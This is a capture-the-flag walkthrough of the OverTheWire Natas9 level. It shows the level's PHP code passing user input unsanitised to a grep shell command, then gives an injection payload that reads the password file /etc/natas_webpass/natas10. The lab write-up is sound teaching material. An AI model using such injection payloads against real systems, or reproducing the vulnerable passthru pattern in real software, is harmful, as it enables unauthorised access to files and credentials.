Natas9 - natas10

From JaxHax
Jump to navigation Jump to search

Level Goal

Find words containing: [____________________________] [Search]

                               <View sourcecode>


Decided to click the <View sourcecode> link which goes to It gave me the following code:

<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="">
<link rel="stylesheet" href="" />
<link rel="stylesheet" href="" />
<script src=""></script>
<script src=""></script>
<script src=></script>
<script src=""></script>
<script>var wechallinfo = { "level": "natas9", "pass": "<censored>" };</script>
      <div id="content">
            Find words containing: <input name=needle>
            <input type=submit name=submit value=Search><br><br>

$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];

if($key != "") {
    passthru("grep -i $key dictionary.txt");

         <div id="viewsource"><a href="index-source.html">View sourcecode</a></div>

So the PHP code is taking the user's search term and passing it to the commandline to do a grep search against dictionary.txt. It isn't doing sanity checks against the user value before dumping it in the commandline command for execution...

This is a classic command injection bug!

Let's just test out the page by submitting good data:

Find words containing: [_data_______________________] [Search]
                               <View sourcecode>

This should have executed the command 'grep -i data dictionary.txt'. Let's try to modify the command with some injection. The password should be stored in /etc/natas_webpass/natas10 (This is a standard on overthewire as seen in other challenges). Let's see if we can make it grep against that using just a period as a wildcard and comment out the dictionary.txt part using #.

If we try:

'. /etc/natas_webpass/natas10 #'

The command should be:

'grep -i . /etc/natas_webpass/natas10 # dictionary.txt'

Let's try it:

Find words containing: [_. /etc/natas_webpass/natas10 #_] [Search]

                               <View sourcecode>

And we win son!